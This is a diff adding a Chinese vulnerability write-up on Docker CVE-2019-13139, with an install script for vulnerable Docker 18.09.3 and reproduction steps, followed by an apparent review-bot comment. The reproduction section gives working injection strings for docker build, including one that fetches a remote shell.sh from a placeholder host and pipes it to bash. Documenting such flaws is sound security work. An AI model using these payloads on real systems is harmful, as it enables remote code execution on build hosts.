diff --git a/云安全漏洞/Docker build 漏洞导致命令执行 CVE-2019-13139.md b/云安全漏洞/Docker build 漏洞导致命令执行 CVE-2019-13139.md new file mode 100644 index 0000000..3d8e866 --- /dev/null +++ b/云安全漏洞/Docker build 漏洞导致命令执行 CVE-2019-13139.md 
@@ -0,0 +1,94 @@ +# Docker build 漏洞导致命令执行 CVE-2019-13139 + +## 漏洞描述 + +使用 `docker build` 命令构建本地镜像时,支持使用远程 url 参数作为构建环境,并且这个远程构建环境可以是一个 git 仓库。 + +在 Docker 18.9.4 之前版本中,`docker build` 过程中对 `remoteUrl` 解析存在缺陷,导致了 `remoteUrl` 中的部分字符串会被作为命令执行。 + +参考链接: + + - https://nvd.nist.gov/vuln/detail/CVE-2019-13139 + - https://staaldraad.github.io/post/2019-07-16-cve-2019-13139-docker-build/ + - https://github.com/Metarget/metarget + +## 漏洞影响 + +``` +Docker < 18.9.4 +``` + +## 环境搭建 + +ubuntu 18.04 使用以下脚本 `install_docker_18.09.03.sh` 安装 Docker 18.9.3: + +``` +#!/bin/bash +set -e +echo "[*] Removing old Docker versions (if any)..." +sudo apt remove -y docker docker-engine docker.io containerd runc || true + +echo "[*] Removing incorrect Docker sources..." +sudo rm -f /etc/apt/sources.list.d/docker.list || true +sudo sed -i '/download.docker.com/d' /etc/apt/sources.list + +echo "[*] Adding Tsinghua University Docker mirror GPG key..." +wget -qO - https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/ubuntu/gpg | sudo apt-key add - + +echo "[*] Adding Tsinghua University Docker mirror repository..." +echo "deb [arch=amd64] https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/ubuntu bionic stable" \ + | sudo tee /etc/apt/sources.list.d/docker.list + +echo "[*] Updating package index..." +sudo apt update + +echo "[*] Searching for Docker 18.09.3..." +VERSION_STRING=$(apt-cache madison docker-ce | grep 18.09.3 | head -n1 | awk '{print $3}') +if [ -z "$VERSION_STRING" ]; then + echo "[*] Docker 18.09.3 not found" + exit 1 +fi +echo "[*] Found version: $VERSION_STRING" + +echo "[*] Installing Docker version $VERSION_STRING ..." +sudo apt install -y docker-ce=$VERSION_STRING docker-ce-cli=$VERSION_STRING containerd.io + +echo "[*] Locking version to prevent automatic updates..." 
+sudo apt-mark hold docker-ce docker-ce-cli containerd.io + +echo "[*] Installation complete, current version:" +docker --version +``` + +![](images/Docker%20build%20漏洞导致命令执行%20CVE-2019-13139/image-20250421090739097.png) + +## 漏洞复现 + +执行相关利用命令,执行结果报错但不影响: + +``` +docker build "git@g.com/a/b#--upload-pack=touch 13139.txt;:" +``` + +查看命令是否执行成功: + +``` +ls | grep 13139 +------ +13139.txt +``` + +![](images/Docker%20build%20漏洞导致命令执行%20CVE-2019-13139/image-20250421090836057.png) + +下载远程 shell 文件并执行: + +``` +# port must be 80 +docker build "git@github.com/a/b#--upload-pack=curl -s your-ip/shell.sh|bash;#:" +``` + +![](images/Docker%20build%20漏洞导致命令执行%20CVE-2019-13139/image-20250421092642068.png) + +## 漏洞修复 + +- 升级至最新版本 https://docs.docker.com/engine/release-notes/ diff --git a/云安全漏洞/images/Docker build 漏洞导致命令执行 CVE-2019-13139/image-20250421090739097.png b/云安全漏洞/images/Docker build 漏洞导致命令执行 CVE-2019-13139/image-20250421090739097.png new file mode 100644 index 0000000..335f965 Binary files /dev/null and b/云安全漏洞/images/Docker build 漏洞导致命令执行 CVE-2019-13139/image-20250421090739097.png differ diff --git a/云安全漏洞/images/Docker build 漏洞导致命令执行 CVE-2019-13139/image-20250421090836057.png b/云安全漏洞/images/Docker build 漏洞导致命令执行 CVE-2019-13139/image-20250421090836057.png new file mode 100644 index 0000000..2ab7f14 Binary files /dev/null and b/云安全漏洞/images/Docker build 漏洞导致命令执行 CVE-2019-13139/image-20250421090836057.png differ diff --git a/云安全漏洞/images/Docker build 漏洞导致命令执行 CVE-2019-13139/image-20250421092642068.png b/云安全漏洞/images/Docker build 漏洞导致命令执行 CVE-2019-13139/image-20250421092642068.png new file mode 100644 index 0000000..5a71c2e Binary files /dev/null and b/云安全漏洞/images/Docker build 漏洞导致命令执行 CVE-2019-13139/image-20250421092642068.png differ
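Review bot: the version notation in the new file is inconsistent and will mislead anyone pinning or searching for a release: 漏洞描述 and 漏洞影响 say `Docker < 18.9.4`, while the environment section, the script name and `grep 18.09.3` use Docker's actual `18.09.x` numbering, so both `18.9.4` occurrences should read `18.09.4`. The 漏洞修复 section should also name the first fixed release explicitly (18.09.4, following from the affected range given above) next to the release-notes link, and add the practical mitigation for hosts that cannot upgrade immediately, which the description already implies: never pass an externally supplied git URL as the `docker build` context, because the `remoteUrl` fragment after `#` is the part that reaches the command line. On the install script: `apt-key add` is deprecated on current Ubuntu releases (it still works on 18.04, which the text targets, so a one-line comment is enough), and `docker-ce=$VERSION_STRING docker-ce-cli=$VERSION_STRING` should quote the variable as `"$VERSION_STRING"`, as the `-z "$VERSION_STRING"` check already does. Two documentation nits: the comment `# port must be 80` states a constraint without saying why (a short reason or a pointer to the staaldraad write-up already in the reference list would do), and all fenced blocks lack a language tag, so `bash` should be added to the script and command blocks for highlighting.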